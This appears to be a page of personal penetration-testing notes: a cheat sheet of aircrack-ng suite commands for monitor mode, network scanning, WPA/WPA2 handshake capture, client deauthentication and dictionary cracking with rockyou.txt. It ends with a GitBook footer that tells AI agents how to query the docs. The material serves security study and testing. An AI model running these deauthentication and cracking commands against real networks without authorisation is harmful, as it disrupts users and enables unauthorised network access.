> For the complete documentation index, see [llms.txt](https://davidtancredi.gitbook.io/pentesting-notes/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://davidtancredi.gitbook.io/pentesting-notes/r3dcl1ff/exploitation-deprecated-node/wireless-attacks.md). # Wireless attacks View the configuration of network interfaces: ``` ifconfig && iwconfig && airmon-ng ``` Turn a network interface on/off: ``` ifconfig wlan0 up ifconfig wlan0 down ``` Restart the network manager: ``` service NetworkManager restart ``` Set the WLAN regulatory domain: ``` iw reg set HR ``` Turn the power of a wireless interface up/down (too high can be illegal in some countries): ``` iwconfig wlan0 txpower 40 ``` Set a wireless network interface to the monitoring mode: ``` airmon-ng start wlan0 ifconfig wlan0 down && iwconfig wlan0 mode monitor && ifconfig wlan0 up ``` Set a wireless network interface to the monitoring mode on a specified channel: ``` airmon-ng start wlan0 8 iwconfig wlan0 channel 8 ``` \[Optional] Kill services that might interfere with wireless network interfaces in the monitoring mode: ``` airmon-ng check kill ``` Set a wireless network interface back to the managed mode: ``` airmon-ng stop wlan0mon ifconfig wlan0 down && iwconfig wlan0 mode managed && ifconfig wlan0 up ``` Search for WiFi networks within your range: ``` airodump-ng --wps -w airodump_sweep_results wlan0mon wash -a -i wlan0mon ``` Monitor a WiFi network to capture handshakes/requests: ``` airodump-ng wlan0mon --channel 8 -w airodump_essid_results --essid essid --bssid FF:FF:FF:FF:FF:FF ``` Check if a wireless interface supports packet injection: ``` aireplay-ng --test wlan1 -e essid -a FF:FF:FF:FF:FF:FF ``` Monitor a WiFi network to capture a WPA/WPA2 4-way handshake: ``` airodump-ng wlan0mon --channel 8 -w airodump_essid_results --essid essid --bssid FF:FF:FF:FF:FF:FF ``` Deauthenticate clients from a WiFi network: ``` aireplay-ng --deauth 10 wlan1 -e essid -a FF:FF:FF:FF:FF:FF ``` Start the dictionary attack against a WPA/WPA2 handshake: ``` aircrack-ng -e essid -b FF:FF:FF:FF:FF:FF -w rockyou.txt airodump_essid_results*.cap ``` #### PMKID Attack: Crack the WPA/WPA2 authentication without deauthenticating clients. ``` apt-get update && apt-get -y install hcxtools ``` --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://davidtancredi.gitbook.io/pentesting-notes/r3dcl1ff/exploitation-deprecated-node/wireless-attacks.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.